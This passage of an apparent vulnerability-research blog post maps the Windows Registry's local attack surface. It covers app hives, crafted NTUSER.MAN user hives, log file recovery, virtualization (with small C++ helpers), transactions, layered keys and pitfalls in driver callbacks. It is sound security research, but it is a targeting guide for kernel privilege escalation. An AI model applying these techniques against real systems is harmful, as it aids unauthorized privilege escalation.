    The introduction of Application Hives in Windows Vista caused a significant shift in the registry attack surface. It allowed unprivileged processes to directly interact with kernel code that was previously only accessible to system services and administrators. Attackers gained access to much of the NtLoadKey syscall logic, including hive file operations, hive parsing at the binary level, hive validation logic in the CmpCheckRegistry function and its subfunctions, and so on. In fact, of the 53 serious vulnerabilities I discovered during my research, 16 (around 30%) either required loading a controlled hive as an app hive, or were significantly easier to trigger using this mechanism.

    It's important to remember that while app hives do open up a broad range of new possibilities for attackers, they don't offer exactly the same capabilities as loading normal (non-app) hives due to several limitations and specific behaviors:

    • They must be loaded under the special path \Registry\A, which means an app hive cannot be loaded just anywhere in the registry hierarchy. This special path is further protected from references by a fully qualified path, which also reduces their usefulness in some offensive applications.
    • The logic for unloading app hives differs from unloading standard hives because the process occurs automatically when all handles to the hive are closed, rather than manually unloading the hive through the RegUnLoadKeyW API or its corresponding syscall from the NtUnloadKey family.
    • Operations on app hive security descriptors are very limited: any calls to the RegSetKeySecurity function or RegCreateKeyExW with a non-default security descriptor will fail, which means that new descriptors cannot be added to such hives.
    • KTM transactions are unconditionally blocked for app hives.

    Despite these minor restrictions, the ability to load arbitrary hives remains one of the most useful tools when exploiting registry bugs. Even if binary control of the hive is not strictly required, it can still be valuable. This is because it allows the attacker to clearly define the initial state of the hive where the attack takes place. By taking advantage of the cell allocator's determinism, it is often possible to achieve 100% exploitation success.

    User hives and Mandatory User Profiles

    Sometimes, triggering a specific bug requires both binary control over the hive and certain features that app hives lack, such as the ability to open a key via its full path. In such cases, an alternative to app hives exists, which might be slightly less practical but still allows for exploiting these more demanding bugs. It involves directly modifying one of the two hives assigned to every user in the system: the user hive (C:\Users\NTUSER.DAT mounted under \Registry\User\<SID>, or in other words, HKCU) or the user classes hive (C:\Users\AppData\Local\Microsoft\Windows\UsrClass.dat mounted under \Registry\User\<SID>_Classes). Naturally, when these hives are actively used by the system, access to their backing files is blocked, preventing simultaneous modification, which complicates things considerably. However, there are two ways to circumvent this problem.

    The first scenario involves a hypothetical attacker who has two local accounts on the targeted system, or similarly, two different users collaborating to take control of the computer (let's call them users A and B). User A can grant user B full rights to modify their hive(s),  and then log out. User B then makes all the required binary changes to the hive and finally notifies user A that they can log back in. At this point, the Profile Service loads the modified hive on behalf of that user, and the initial goal is achieved.

    The second option is more practical as it doesn't require two different users. It abuses Mandatory User Profiles, a system functionality that prioritizes the NTUSER.MAN file in the user's directory over the NTUSER.DAT file as the user hive, if it exists (it doesn't exist in the default system installation). This means that a single user can place a specially prepared hive under the NTUSER.MAN name in their home directory, then log out and log back in. Afterwards, NTUSER.MAN will be the user's active HKCU key, achieving the goal. However, the technique also has some drawbacks – it only applies to the user hive (not UsrClass.dat), and it is somewhat noisy. Once the NTUSER.MAN file has been created and loaded, there is no way to delete it by the same user, as it will always be loaded by the system upon login, effectively blocking access to it.

    A few examples of bugs involving one of the two above techniques are CVE-2023-21675, CVE-2023-35356, and CVE-2023-35633. They all required the existence of a special type of key called a predefined key within a publicly accessible hive, such as HKCU. Even when predefined keys were still supported, they could not be created using the system API, and the only way to craft them was by directly setting a specific flag within the internal key node structure in the hive file.

    Log file parsing: .LOG/.LOG1/.LOG2

    One of the fundamental features of the registry is that it guarantees consistency at the level of interdependent cells that together form the structure of keys within a given hive. This refers to a situation where a single operation on the registry involves the simultaneous modification of multiple cells. Even if there is a power outage and the system restarts in the middle of performing this operation, the registry guarantees that all intermediate changes will either be applied or discarded. Such "atomicity" of operations is necessary in order to guarantee the internal consistency of the hive structure, which, as we know, is important to security. The mechanism is implemented by using additional files associated with the hive, where the intermediate state of registry modifications is saved with the granularity of a memory page (4 KiB), and which can be safely rolled forward or rolled back at the next hive load. Usually these are two files with the .LOG1 and .LOG2 extensions, but it is also possible to force the use of a single log file with the .LOG extension by passing the REG_HIVE_SINGLE_LOG flag to syscalls from the NtLoadKey family.

    Internally, each LOG file can be encoded in one of two formats. One is the "legacy log file", a relatively simple format that has existed since the first implementation of the registry in Windows NT 3.1. Another one is the "incremental log file", a slightly more modern and complex format introduced in Windows 8.1 to address performance issues that plagued the previous version. Both formats use the same header as the normal regf format (the first 512 bytes of the _HBASE_BLOCK structure, up to the CheckSum field), with the Type field set to 0x1 (legacy log file on Windows XP and newer), 0x2 (legacy log file on Windows 2000 and older), or 0x6 (incremental log file). Further at offset 0x200, legacy log files contain the signature 0x54524944 ("DIRT") followed by the "dirty vector", while incremental log files contain successive records represented by the magic value 0x454C7648 ("HvLE").

    These formats are well-documented in two unofficial regf documentations: GitHub: libyal/libregf and GitHub: msuhanov/regf.  Additional information can be found in the "Stable storage" and "Incremental logging" subsections of the Windows Internals (Part 2, 7th Edition) book and its earlier editions.

    From a security perspective, it's important to note that LOG files are processed for app hives, so their handling is part of the local attack surface. On the other hand, this attack surface isn't particularly large, as it boils down to just a few functions that are called by the two highest-level routines: HvAnalyzeLogFiles and HvpPerformLogFileRecovery. The potential types of bugs are also fairly limited, mainly consisting of shallow memory safety violations. Two specific examples of vulnerabilities related to this functionality are CVE-2023-35386 and CVE-2023-38154.

    Log file parsing: KTM logs

    Besides ensuring atomicity at the level of individual operations, the Windows Registry also provides two ways to achieve atomicity for entire groups of operations, such as creating a key and setting several of its values as part of a single logical unit. These mechanisms are based on two different types of transactions: KTM transactions (managed by the Kernel Transaction Manager, implemented by the tm.sys driver) and lightweight transactions, which were designed specifically for the registry. Notably, lightweight transactions exist in memory only and are never written to disk, so they do not represent an attack vector during hive loading, because there is no file recovery logic.

    KTM transactions are available for use in any loaded hive that doesn't have the REG_APP_HIVE and REG_HIVE_NO_RM flags. To utilize them, a transaction object must first be created using the CreateTransaction API. The resulting handle is then passed to the RegOpenKeyTransacted, RegCreateKeyTransacted, or RegDeleteKeyTransacted registry functions. Finally, the entire transaction is committed via CommitTransaction. Windows attempts to guarantee that active transactions that are caught mid-commit during a sudden system shutdown will be rolled forward when the hive is loaded again. To achieve this, the Windows kernel employs the Common Log File System interface to save serialized records detailing individual operations to the .blf files that accompany the main hive file. When a hive is loaded, the system checks for unapplied changes in these .blf files. If any are found, it deserializes the individual records and attempts to redo all the actions described within them. This logic is primarily handled by the internal functions CmpRmAnalysisPhase, CmpRmReDoPhase, and CmpRmUnDoPhase, as well as the functions surrounding them in the control flow graph.

    Given that KTM transactions are never enabled for app hives, the possibility of an unprivileged user exploiting this functionality is severely limited. The only option is to focus on KTM log files associated with regular hives that a local user has some control over, namely the user hive (NTUSER.DAT) and the user classes hive (UsrClass.dat). If a transactional operation is performed on a user's HKCU hive, additional .regtrans-ms and .blf files appear in their home directory. Furthermore, if these files don't exist at first, they can be planted on the disk manually, and will be processed by the Windows kernel after logging out and logging back in. Interestingly, even when the KTM log files are actively in use, they have the read sharing mode enabled. This means that a user can write data to these logs by performing transactional operations, and read from them directly at the same time.

    Historically, the handling of KTM logs has been affected by a significant number of security issues. Between 2019 and 2020, James Forshaw reported three serious bugs in this code: CVE-2019-0959, CVE-2020-1377, and CVE-2020-1378. Subsequently, during my research, I discovered three more: CVE-2023-28271, CVE-2023-28272, and CVE-2023-28293. However, the strangest thing is that, according to my tests, the entire logic for restoring the registry state from KTM logs stopped working due to code refactoring introduced in Windows 10 1607 (almost 9 years ago) and has not been fixed since. I described this observation in another report related to transactions, in a section called "KTM transaction recovery code". I'm not entirely sure whether I'm making a mistake in testing, but if this is truly the case, it means that the entire recovery mechanism currently serves no purpose and only needlessly increases the system's attack surface. Therefore, it could be safely removed or, at the very least, actually fixed.

    Direct registry operations through standard syscalls

    Direct operations on keys and values are the core of the registry and make up most of its associated code within the Windows kernel. These basic operations don't need any special permissions and are accessible by all users, so they constitute the primary attack surface available to a local attacker. These actions have been summarized at the beginning of blog post #2, and should probably be familiar by now. As a recap, here is a table of the available operations, including the corresponding high-level API function, system call name, and internal kernel function name if it differs from the syscall:

    Operation name

    Registry API name(s)

    System call(s)

    Internal kernel handler (if different than syscall)

    Load hive

    RegLoadKey

    RegLoadAppKey

    NtLoadKey
    NtLoadKey2

    NtLoadKeyEx

    NtLoadKey3

    -

    Count open subkeys in hive

    -

    NtQueryOpenSubKeys

    -

    Flush hive

    RegFlushKey

    NtFlushKey

    -

    Open key

    RegOpenKeyEx

    RegOpenKeyTransacted

    NtOpenKey

    NtOpenKeyEx

    NtOpenKeyTransacted

    NtOpenKeyTransactedEx

    CmpParseKey

    Create key

    RegCreateKeyEx

    RegCreateKeyTransacted

    NtCreateKey

    NtCreateKeyTransacted

    CmpParseKey

    Delete key

    RegDeleteKeyEx
    RegDeleteKeyTransacted

    NtDeleteKey

    -

    Rename key

    RegRenameKey

    NtRenameKey

    -

    Set key security

    RegSetKeySecurity

    NtSetSecurityObject

    CmpSecurityMethod

    Query key security

    RegGetKeySecurity

    NtQuerySecurityObject

    CmpSecurityMethod

    Set key information

    -

    NtSetInformationKey

    -

    Query key information

    RegQueryInfoKey

    NtQueryKey

    -

    Enumerate subkeys

    RegEnumKeyEx

    NtEnumerateKey

    -

    Notify on key change

    RegNotifyChangeKeyValue

    NtNotifyChangeKey

    NtNotifyChangeMultipleKeys

    -

    Query key path

    -

    NtQueryObject

    CmpQueryKeyName

    Close key handle

    RegCloseKey

    NtClose

    CmpCloseKeyObject

    CmpDeleteKeyObject

    Set value

    RegSetValueEx

    NtSetValueKey

    -

    Delete value

    RegDeleteValue

    NtDeleteValueKey

    -

    Enumerate values

    RegEnumValue

    NtEnumerateValueKey

    -

    Query value data

    RegQueryValueEx

    NtQueryValueKey

    -

    Query multiple values

    RegQueryMultipleValues

    NtQueryMultipleValueKey

    -

    Some additional comments:

    • A regular user can directly load only application hives, using the RegLoadAppKey function or its corresponding syscalls with the REG_APP_HIVE flag. Loading standard hives, using the RegLoadKey function, is reserved for administrators only. However, this operation is still indirectly accessible to other users through the NTUSER.MAN hive and the Profile Service, which can load it as a user hive during system login.
    • When selecting API functions for the table above, I prioritized their latest versions (often with the "Ex" suffix, meaning "extended"). I also chose those that are the thinnest wrappers and closest in functionality to their corresponding syscalls on the kernel side. In the official Microsoft documentation, you'll also find many older/deprecated versions of these functions, which were available in early Windows versions and now exist solely for backward compatibility (e.g., RegOpenKey, RegEnumKey). Additionally, there are also helper functions that implement more complex logic on the user-mode side (e.g., RegDeleteTree, which recursively deletes an entire subtree of a given key), but they don't add anything in terms of the kernel attack surface.
    • There are several operations natively supported by the kernel that do not have a user-mode equivalent, such as NtQueryOpenSubKeys or NtSetInformationKey. The only way to use these interfaces is to call their respective system calls directly, which is most easily achieved by calling their wrappers with the same name in the ntdll.dll library. Furthermore, even when a documented API function exists, it may not expose all the capabilities of its corresponding system call. For example, the RegQueryKeyInfo function returns some information about a key, but much more can be learned by using NtQueryKey directly with one of the supported information classes.

    Moreover, there is a group of syscalls that do require administrator rights (specifically SeBackupPrivilege, SeRestorePrivilege, or PreviousMode set to KernelMode). These syscalls are used either for registry management by the kernel or system services, or for purely administrative tasks (such as performing registry backups). They are not particularly interesting from a security research perspective, as they cannot be used to elevate privileges, but it is worth mentioning them by name:

    • NtCompactKeys
    • NtCompressKey
    • NtFreezeRegistry
    • NtInitializeRegistry
    • NtLockRegistryKey
    • NtQueryOpenSubKeysEx
    • NtReplaceKey
    • NtRestoreKey
    • NtSaveKey
    • NtSaveKeyEx
    • NtSaveMergedKeys
    • NtThawRegistry
    • NtUnloadKey
    • NtUnloadKey2
    • NtUnloadKeyEx

    Incorporating advanced features

    Despite the fact that most power users are familiar with the basic registry operations (e.g., from using Regedit.exe), there are still some modifiers that can change the behavior of these operations, thereby complicating their implementation and potentially leading to interesting bugs. To use these modifiers, additional steps are often required, such as enabling registry virtualization, creating a transaction, or loading a differencing hive. When this is done, the information about the special key properties are encoded within the internal kernel structures, and the key handle itself is almost indistinguishable from other handles as seen by the user-mode application. When operating on such advanced keys, the logic for their handling is executed in the standard registry syscalls transparently to the user. The diagram below illustrates the general, conceptual control flow in registry-related system calls:

    A flowchart outlines a system process beginning with input argument checks and referencing key handles. An internal operation handler then makes decisions based on whether a key is layered or transacted, leading to specific logic paths. The process concludes with copying output data and invoking post registry callbacks before stopping.

    This is a very simplified outline of how registry syscalls work, but it shows that a function theoretically supporting one operation can actually hide many implementations that are dynamically chosen based on various factors. In terms of specifics, there are significant differences depending on the operation and whether it is a "read" or "write" one. For example, in "read" operations, the execution paths for transactional and non-transactional operations are typically combined into one that has built-in transaction support but can also operate without them. On the other hand, in "write" operations, normal and transactional operations are always performed differently, but there isn't much code dedicated to layered keys (except for the so-called key promotion operations), since when writing to a layered key, the state of keys lower on the stack is usually not as important. As for the "Internal operation handler" area marked within the large rectangle with the dotted line, these are internal functions responsible for the core logic of a specific operation, and whose names typically begin with "Cm" instead of "Nt". For example, for the NtDeleteKey syscall, the corresponding internal handler is CmDeleteKey, for NtQueryKey it is CmQueryKey, for NtEnumerateKey it is CmEnumerateKey, and so on.

    In the following sections, we will take a closer look at each of the possible complications.

    Predefined keys and symbolic links

    Predefined keys were deprecated in 2023, so I won't spend much time on them here. It's worth mentioning that on modern systems, it wasn't possible to create them in any way using the API, or even directly using syscalls. The only way to craft such a key in the registry was to create it in binary form in a controlled hive file and have it loaded via RegLoadAppKey or as a user hive. These keys had very strange semantics, both at the key node level (unusual encoding of _CM_KEY_NODE.ValueList) and at the kernel key body object level (non-standard value of _CM_KEY_BODY.Type). Due to the need to filter out these keys at an early stage of syscall execution, there are special helper functions whose purpose is to open the key by handle and verify whether it is or isn't a predefined handle (CmObReferenceObjectByHandle and CmObReferenceObjectByName). Consequently, hunting for bugs related to predefined handles involved verifying whether each syscall used the above wrappers correctly, and whether there was some other way to perform an operation on this type of key while bypassing the type check. As I have mentioned, this is now just a thing of the past, as predefined handles in input hives are no longer supported and therefore do not pose a security risk to the system.

    When it comes to symbolic links, this is a semi-documented feature that requires calling the RegCreateKeyEx function with the special REG_OPTION_CREATE_LINK flag to create them. Then, you need to set a value named "SymbolicLinkValue" and of type REG_LINK, which contains the target of the symlink as an absolute, internal registry path (\Registry\...) written using wide characters. From that point on, the link points to the specified path. However, it's important to remember that traversing symbolic links originating from non-system hives is heavily restricted: it can only occur within a single "trust class" (e.g., between the user hive and user classes hive of the same user). As a result, links located in app hives are never fully functional, because each app hive resides in its own isolated trust class, and they cannot reference themselves either, as references to paths starting with "\Registry\A" are blocked by the Windows kernel.

    As for auditing symbolic links, they are generally resolved during the opening/creation of a key. Therefore, the analysis mainly involves the CmpParseKey function and lower-level functions called within it, particularly CmpGetSymbolicLinkTarget, which is responsible for reading the target of a given symlink and searching for it in existing registry structures. Issues related to symlinks can also be found in registry callbacks registered by third-party drivers, especially those that handle the RegNtPostOpenKey/RegNtPostCreateKey and similar operations. Correctly handling "reparse" return values and the multiple call loops performed by the NT Object Manager is not an easy feat to achieve.

    Registry virtualization

    Registry virtualization, introduced in Windows Vista, ensures backward compatibility for older applications that assume administrative privileges when using the registry. This mechanism redirects references between HKLM\Software and HKU\<SID>_Classes\VirtualStore subkeys transparently, allowing programs to "think" they write to the system hive even though they don't have sufficient permissions for it. The virtualization logic, integrated into nearly every basic registry syscall, is mostly implemented by three functions:

    • CmKeyBodyRemapToVirtualForEnum: Translates a real key inside a virtualized hive (HKLM\Software) to a virtual key inside the VirtualStore of the user classes hive during read-type operations. This is done to merge the properties of both keys into a single state that is then returned to the caller.
    • CmKeyBodyRemapToVirtual: Translates a real key to its corresponding virtual key, and is used in the key deletion and value deletion operations. This is done to delete the replica of a given key in VirtualStore or one of its values, instead of its real instance in the global hive.
    • CmKeyBodyReplicateToVirtual: Replicates the entire key structure that the caller wants to create in the virtualized hive, inside of the VirtualStore.

    All of the above functions have a complicated control flow, both in terms of low-level implementation (e.g., they implement various registry path conversions) and logically – they create new keys in the registry, merge the states of different keys into one, etc. As a result, it doesn't really come as a big surprise that the code has been affected by many vulnerabilities. Triggering virtualization doesn't require any special rights, but it does need a few conditions to be met:

    • Virtualization must be specifically enabled for a given process. This is not the default behavior for 64-bit programs but can be easily enabled by calling the SetTokenInformation function with the TokenVirtualizationEnabled argument on the security token of the process.
    • Depending on the desired behavior, the appropriate combination of VirtualSource/VirtualTarget/VirtualStore flags should be set in _CM_KEY_NODE.Flags. This can be achieved either through binary control over the hive or by setting it at runtime using the NtSetInformationKey call with the KeySetVirtualizationInformation argument.
    • The REG_KEY_DONT_VIRTUALIZE flag must not be set in the _CM_KEY_NODE.VirtControlFlags field for a given key. This is usually not an issue, but if necessary, it can be adjusted either in the binary representation of the hive or using the NtSetInformationKey call with the KeyControlFlagsInformation argument.
    • In specific cases, the source key must be located in a virtualizable hive. In such scenarios, the HKLM\Software\Microsoft\DRM key becomes very useful, as it meets this condition and has a permissive security descriptor that allows all users in the system to create subkeys within it.

    With regards to the first two points, many examples of virtualization-related bugs can be found in the Project Zero bug tracker. These reports include proof-of-concept code that correctly sets the appropriate flags. For simplicity, I will share that code here as well; the two C++ functions responsible for enabling virtualization for a given security token and registry key are shown below:

    BOOL EnableTokenVirtualization(HANDLE hToken, BOOL bEnabled) {

      DWORD dwVirtualizationEnabled = bEnabled;

      return SetTokenInformation(hToken,

                                 TokenVirtualizationEnabled,

                                 &dwVirtualizationEnabled,

                                 sizeof(dwVirtualizationEnabled));

    }

    BOOL EnableKeyVirtualization(HKEY hKey,

                                 BOOL VirtualTarget,

                                 BOOL VirtualStore,

                                 BOOL VirtualSource) {

      KEY_SET_VIRTUALIZATION_INFORMATION VirtInfo;

      VirtInfo.VirtualTarget = VirtualTarget;

      VirtInfo.VirtualStore = VirtualStore;

      VirtInfo.VirtualSource = VirtualSource;

      VirtInfo.Reserved = 0;

      NTSTATUS Status = NtSetInformationKey(hKey,

                                            KeySetVirtualizationInformation,

                                            &VirtInfo,

                                            sizeof(VirtInfo));

      return NT_SUCCESS(Status);

    }


    And their example use:

    HANDLE hToken;

    HKEY hKey;

    //

    // Enable virtualization for the token.

    //

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {

      printf("OpenProcessToken failed with error %u\n", GetLastError());

      return 1;

    }

    EnableTokenVirtualization(hToken, TRUE);

    //

    // Enable virtualization for the key.

    //

    hKey = RegOpenKeyExW(...);

    EnableKeyVirtualization(hKey,

                            /*VirtualTarget=*/TRUE,

                            /*VirtualStore=*/ TRUE,

                            /*VirtualSource=*/FALSE);

    Transactions

    There are two types of registry transactions: KTM and lightweight. The former are transactions implemented on top of the tm.sys (Transaction Manager) driver, and they try to provide certain guarantees of transactional atomicity both during system run time and even across reboots. The latter, as the name suggests, are lightweight transactions that exist only in memory and whose task is to provide an easy and quick way to ensure that a given set of registry operations is applied atomically. As potential attackers, there are three parts of the interface that we are interested in the most: creating a transaction object, rolling back a transaction, and committing a transaction. The functions responsible for all three actions in each type of transaction are shown in the table below:

    Operation

    KTM (API)

    KTM (system call)

    Lightweight (API)

    Lightweight (system call)

    Create transaction

    CreateTransaction

    NtCreateTransaction

    -

    NtCreateRegistryTransaction

    Rollback transaction

    RollbackTransaction

    NtRollbackTransaction

    -

    NtRollbackRegistryTransaction

    Commit transaction

    CommitTransaction

    NtCommitTransaction

    -

    NtCommitRegistryTransaction

    As we can see, the KTM has a public, documented API interface, which cannot be said for lightweight transactions that can only be used via syscalls. Their definitions, however, are not too difficult to reverse engineer, and they come down to the following prototypes:

    NTSTATUS NtCreateRegistryTransaction(PHANDLE OutputHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, ULONG Reserved);

    NTSTATUS NtRollbackRegistryTransaction(HANDLE Handle, ULONG Reserved);

    NTSTATUS NtCommitRegistryTransaction(HANDLE Handle, ULONG Reserved);


    Upon the creation of a transaction object, whether of type TmTransactionObjectType (KTM) or CmRegistryTransactionType (lightweight), its subsequent usage becomes straightforward. The transaction handle is passed to either the RegOpenKeyTransacted or the RegCreateKeyTransacted function, yielding a key handle. The key's internal properties, specifically the key body structure, will reflect its transactional nature. Operations on this key proceed identically to the non-transactional case, using the same functions. However, changes are temporarily confined to the transaction context, isolated from the global registry view. Upon the completion of all transactional operations, the user may elect either to discard the changes via a rollback, or apply them atomically through a commit. From the developer's perspective, this interface is undeniably convenient.

    From an attack surface perspective, there's a substantial amount of code underlying the transaction functionality. Firstly, the handler for each base operation includes code to verify that the key isn't locked by another transaction, to allocate and initialize a UoW (unit of work) object, and then write it to the internal structures that describe the transaction. Secondly, to maintain consistency with the new functionality, the existing non-transactional code must first abort all transactions associated with a given key before it can be modified.

    But that's not the end of the story. The commit process itself is also complicated, as it must cleverly circumvent various registry limitations resulting from its original design. In 2023, most of the code responsible for KTM transactions was removed as a result of CVE-2023-32019, but there is still a second engine that was initially responsible for lightweight transactions and now handles all of them. It consists of two stages: "Prepare" and "Commit". During the prepare stage, all steps that could potentially fail are performed, such as allocating all necessary cells in the target hive. Errors are allowed and correctly handled in the prepare stage, because the globally visible state of the registry does not change yet. This is followed by the commit stage, which is designed so that nothing can go wrong – it no longer performs any dynamic allocations or other complex operations, and its whole purpose is to update values in both the hive and the kernel descriptors so that transactional changes become globally visible. The internal prepare handlers for each individual operation have names starting with "CmpLightWeightPrepare" (e.g., CmpLightWeightPrepareAddKeyUoW), while the corresponding commit handlers start with "CmpLightWeightCommit" (e.g., CmpLightWeightCommitAddKeyUoW). These are the two main families of functions that are most interesting from a vulnerability research perspective. In addition to them, it is also worth analyzing the rollback functionality, which is used both when the rollback is requested directly by the user and when an error occurs in the prepare stage. This part is mainly handled by the CmpTransMgrFreeVolatileData function.

    Layered keys

    Layered keys are the latest major change of this type in the Windows Registry, introduced in 2016. They overturned many fundamental assumptions that had been in place until then. A given logical key no longer consists solely of one key node and a maximum of one active KCB, but of a whole stack of these objects: from the layer height of the given hive down to layer zero, which is the base hive. A key that has a key node may in practice be non-existent (if marked as a tombstone), and vice versa, a key without a key node may logically exist if there is an existing key with the same name lower in its stack. In short, this whole containerization mechanism has doubled the complexity of every single registry operation, because:

    • Querying for information about a key has become more difficult, because instead of gathering information from just one key, it has to be potentially collected from many keys at once and combined into a coherent whole for the caller.
    • Performing any "write" operations has become more difficult because before writing any information to the key at a given nesting level, you first need to make sure that the key and all its ancestors in a given hive exist, which is done in a complicated process called "key promotion".
    • Deleting and renaming a key has become more difficult, because you always have to consider and correctly handle higher-level keys that rely on the one you are modifying. This is especially true for Merge-Unbacked keys, which do not have their own representation and only reflect the state of the keys at a lower level. This also applies to ordinary keys from hives under HKLM and HKU, which by themselves have nothing to do with differencing hives, but as an integral part of the registry hierarchy, they also have to correctly support this feature.
    • Performing security access checks on a key has become more challenging due to the need to accurately pinpoint the relevant security descriptor on the key stack first.

    Overall, the layered keys mechanism is so complex that it could warrant an entire blog post (or several) on its own, so I won't be able to explain all of its aspects here. Nevertheless, its existence will quickly become clear to anyone who starts reversing the registry implementation. The code related to this functionality can be identified in many ways, for example:

    • By references to functions that initialize the key node stack / KCB stack objects (i.e., CmpInitializeKeyNodeStack, CmpStartKcbStack, and CmpStartKcbStackForTopLayerKcb),
    • By dedicated functions that implement a given operation specifically on layered keys that end with "LayeredKey" (e.g., CmDeleteLayeredKey, CmEnumerateValueFromLayeredKey, CmQueryLayeredKey),
    • By references to the KCB.LayerHeight field, which is very often used to determine whether the code is dealing with a layered key (height greater than zero) or a base key (height equal to zero).

    I encourage those interested in further exploring this topic to read Microsoft's Containerized Configuration patent (US20170279678A1), the "Registry virtualization" section in Chapter 10 of Windows Internals (Part 2, 7th Edition), as well as my previous blog post #6, where I briefly described many internal structures related to layered keys. All of these references are great resources that can provide a good starting point for further analysis.

    When it comes to layered keys in the context of attack entry points, it's important to note that loading custom differencing hives in Windows is not straightforward. As I wrote in blog post #4, loading this type of hive is not possible at all through any standard NtLoadKey-family syscall. Instead, it is done by sending an undocumented IOCTL 0x220008 to \Device\VRegDriver, which then passes this request on to an internal kernel function named CmLoadDifferencingKey. Therefore, the first obstacle is that in order to use this IOCTL interface, one would have to reverse engineer the layout of its corresponding input structure. Fortunately, I have already done it and published it in the blog post under the VRP_LOAD_DIFFERENCING_HIVE_INPUT name. However, a second, much more pressing problem is that communicating with the VRegDriver requires administrative rights, so it can only be used for testing purposes, but not in practical privilege escalation attacks.

    So, what options are we left with? Firstly, there are potential scenarios where the exploit is packaged in a mechanism that legitimately uses differencing hives, e.g., an MSIX-packaged application running in an app silo, or a specially crafted Docker container running in a server silo. In such cases, we provide our own hives by design, which are then loaded on the victim’s system on our behalf when the malicious program or container is started. The second option is to simply ignore the inability to load our own hive and use one already present in the system. In a default Windows installation, many built-in applications use differencing hives, and the \Registry\WC key can be easily enumerated and opened without any problems (unlike \Registry\A). Therefore, if we launch a program running inside an app silo (e.g., Notepad) as a local user, we can then operate on the differencing hives loaded by it. This is exactly what I did in most of my proof-of-concept exploits related to this functionality. Of course, it is possible that a given bug will require full binary control over the differencing hive in order to trigger it, but this is a relatively rare case: of the 10 vulnerabilities I identified in this code, only two of them required such a high degree of control over the hive.

    Alternative registry attack targets

    The most crucial attack surface associated with the registry is obviously its implementation within the Windows kernel. However, other types of software interact with the registry in many ways and can be also prone to privilege escalation attacks through this mechanism. They are discussed in the following sections.

    Drivers implementing registry callbacks

    Another area where potential registry-related security vulnerabilities can be found is Registry Callbacks. This mechanism, first introduced in Windows XP and still present today, provides an interface for kernel drivers to log or interfere with registry operations in real-time. One of the most obvious uses for this functionality is antivirus software, which relies on registry monitoring. Microsoft, aware of this need but wanting to avoid direct syscall hooking by drivers, was compelled to provide developers with an official, documented API for this purpose.

    From a technical standpoint, callbacks can be registered using either the CmRegisterCallback function or its more modern version, CmRegisterCallbackEx. The documentation for these functions serves as a good starting point for exploring the mechanism, as it seamlessly leads to the documentation of the callback function itself, and from there to the documentation of all the structures that describe the individual operations. Generally speaking, callbacks can monitor virtually any type of registry operation, both before ("pre" callbacks) and after ("post" callbacks) it is performed. They can be used to inspect what is happening in the system and log the details of specific events of interest. Callbacks can also influence the outcome of an operation. In "pre" notifications, they can modify input data or completely take control of the operation and return arbitrary information to the caller while bypassing the standard operation logic. During "post" notification handling, it is possible to influence both the status returned to the user and the output data. Overall, depending on the amount and types of operations supported in a callback, a completely error-free implementation can be really difficult to write. It requires excellent knowledge of the inner workings of the registry, as well as a very thorough reading of the documentation related to callbacks. The contracts that exist between the Windows kernel and the callback code can be very complicated, so in addition to the sources mentioned above, it's also worth reading the entire separate series of seven articles detailing various callback considerations, titled Filtering Registry Calls.

    Here are some examples of things that can go wrong in the implementation of callbacks:

    • Standard user-mode memory access bugs. As per the documentation (refer to the table at the bottom of the Remarks section), pointers to output data received in "post" type callbacks contain the original user-mode addresses passed to the syscall by the caller. This means that if the callback wants to reference this data in any way, the only guarantee it has is that these pointers have been previously probed. However, it is still important to access this memory within a try/except block and to avoid potential double-fetch vulnerabilities by always copying the data to a kernel-mode buffer first before operating on it.
    • A somewhat related but higher-level issue is excessive trust in the output data structure within "post" callbacks. The problem is that some registry syscalls return data in a strictly structured way, and since the "post" callback executes before returning to user mode, it might seem safe to trust that the output data conforms to its documented format (if one wants to use or slightly modify it). An example of such a syscall is NtQueryKey, which returns a specific structure for each of the several possible information classes. In theory, it would appear that a malicious program has not yet had the opportunity to modify this data, and it should still be valid when the callback executes. In practice, however, this is not the case, because the output data has already been copied to user-mode, and there may be a parallel user thread modifying it concurrently. Therefore, it is very important that if one wants to use the output data in the "post" callback, they must first fully sanitize it, assuming that it may be completely arbitrary and is as untrusted as any other input data.
    • Moving up another level, it's important to prevent confused deputy problems that exploit the fact that callback code runs with kernel privileges. For example, if a callback wanted to redirect access to certain registry paths to another location, and it used the ZwCreateKey call without the OBJ_FORCE_ACCESS_CHECK flag to do so, it would allow an attacker to create keys in locations where they normally wouldn't have access.
    • Bugs in the emulation of certain operations in "pre"-type callbacks. If a callback decides to handle a given request on its own and signal this to the kernel by returning the STATUS_CALLBACK_BYPASS code, it is responsible for filling all important fields in the corresponding REG_XXX_KEY_INFORMATION structure so that, in accordance with the expected syscall behavior, the output data is correctly returned to the caller (source: "When a registry filtering driver's RegistryCallback routine receives a pre-notification [...]" and "Alternatively, if the driver changes a status code from failure to success, it might have to provide appropriate output parameters.").
    • Bugs in "post"-type callbacks that change an operation's status from success to failure. If we want to block an operation after it has already been executed, we must remember that it has already occurred, with all its consequences and side effects. To successfully pretend that it did not succeed, we would have to reverse all its visible effects for the user and release the resources allocated for this purpose. For some operations, this is very difficult or practically impossible to do cleanly, so I would personally recommend only blocking operations at the "pre" stage and refraining from trying to influence their outcome at the "post" stage (source: "If the driver changes a status code from success to failure, it might have to deallocate objects that the configuration manager allocated.").
    • Challenges presented by error handling within "post"-type callbacks. As per the documentation, the kernel only differentiates between a STATUS_CALLBACK_BYPASS return value and all others, which means that it doesn't really discern callback success or failure. This is somewhat logical since, at this stage, there isn't a good way to handle failures – the operation has already been performed. On the other hand, it may be highly unintuitive, as the Windows kernel idiom "if (!NT_SUCCESS(Status)) { return Status; }" becomes ineffective here. If an error is returned, it won't propagate to user mode, and will only cause premature callback exit, potentially leaving some important operations unfinished. To address this, you should design "post" callbacks to be inherently fail-safe (e.g., include no dynamic allocations), or if this isn't feasible, implement error handling cautiously, ensuring that minor operation failures don't compromise the callback's overall logical/security guarantees.
    • Issues surrounding the use of a key object pointer passed to the callback, in one of a few specific scenarios where it can have a non-NULL value but not point to a valid key object. This topic is explored in a short article in Microsoft Learn: Invalid Key Object Pointers in Registry Notifications.
    • Issues in open/create operation callbacks due to missing or incorrect handling of symbolic links and other redirections, which are characterized by the return values STATUS_REPARSE and STATUS_REPARSE_GLOBAL.
    • Bugs that result from a lack of transaction support where it is needed. This could be an incorrect assumption that every operation performed on the registry is non-transactional and its effect is visible immediately, and not only after the transaction is committed. The API function that is used to retrieve the transaction associated with a given key (if it exists) during callback execution is CmGetBoundTransaction.
